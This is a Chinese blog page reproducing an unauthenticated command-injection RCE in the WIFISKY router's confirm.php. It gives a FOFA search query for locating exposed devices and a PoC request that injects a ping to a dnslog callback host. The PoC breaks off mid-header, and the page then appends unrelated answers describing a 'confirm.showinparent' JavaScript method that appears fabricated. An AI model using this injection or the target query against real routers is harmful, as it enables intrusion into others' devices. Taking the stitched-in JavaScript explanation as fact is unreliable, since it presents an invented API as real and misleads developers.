WIFISKY 7层流控路由器 confirm.php RCE漏洞复现

0x01 产品简介

WIFISKY-7层流控路由器是一款可用于家庭或办公环境的无线路由器,具备流控功能以优化网络流量和提供更稳定的网络连接。该路由器采用了7层流控技术,能够依据网络数据包的内容进行智能管理,从而实现对网络流量的精细化控制和优化。这种技术可以提升网络的整体性能,并且确保网络服务按照设定的规则运行,以满足不同应用和用户的需求。

0x02 漏洞概述

WIFISKY-7层流控路由器 confirm.php接口处存在命令执行漏洞,未经身份验证的远程攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

0x03 复现环境

FOFA:app="WIFISKY-7层流控路由器"

0x04 漏洞复现

PoC

GET /notice/confirm.php?t=;ping%20xxxx.dnslog.cn HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, defla
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
### 回答1: 通过使用`confirm.showinparent`方法,可以在父窗口中显示一个确认对话框。 确认对话框是一种常用的交互方式,用于询问用户是否同意或确认某个操作。在JavaScript中,可以使用`confirm()`函数来创建一个确认对话框,并返回一个布尔值表示用户的选择(是或否)。 `confirm.showinparent`方法是一种扩展的方式,它可以在父窗口中显示确认对话框而不是在当前窗口中显示。这对于通过弹出窗口或iframe嵌入的情况特别有用,可以确保用户在父窗口中的操作。 使用`confirm.showinparent`方法的语法如下: ```javascript confirm.showinparent(message); ``` 其中,`message`是一个可选的字符串参数,用于在确认对话框中显示一条消息文本。如果省略该参数,则对话框将不显示任何消息文本,仅显示默认的确认和取消按钮。 当用户选择确认按钮时,`confirm.showinparent`方法返回`true`;当用户选择取消按钮时,返回`false`。我们可以使用条件语句来根据用户的选择执行相应的操作。 总结:`confirm.showinparent`是一个在父窗口中显示确认对话框的JavaScript方法。它可以用于在弹出窗口或iframe嵌入的场景下确认用户的选择,并根据选择执行相应的操作。 ### 回答2: confirm.showinparent javascript 是一个在父窗口中显示确认对话框的 JavaScript 方法。当我们在网页中使用 JavaScript,有时候需要显示一个确认对话框,以便用户确认或取消某个操作。confirm.showinparent() 方法就可以满足这个需求。 通常情况下,我们使用 confirm() 方法来显示确认对话框,该对话框会在当前窗口中打开。但有时候,我们希望确认对话框显示在父窗口中,而不是当前窗口。这时,confirm.showinparent() 方法就可以派上用场了。 使用 confirm.showinparent() 方法,我们可以在 JavaScript 代码中调用该方法,并传入提示消息作为参数。这样,就会在父窗口中显示一个确认对话框,要求用户点击确认或取消按钮。 这个方法的使用场景可能是当我们需要在嵌入的框架中显示确认对话框时。比如,当我们在一个网页中嵌入了一个广告或其他内容,并希望在用户点击相关元素时,通过确认对话框确认用户的意图。通过使用 confirm.showinparent() 方法,我们就可以在父窗口中显示这个确认对话框,而不是在当前窗口中。 总的来说,confirm.showinparent javascript 方法是为了在父窗口中显示确认对话框而存在的。使用该方法,我们可以在 JavaScript 中调用该函数,并传入相应的参数,以在父窗口中显示确认对话框。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值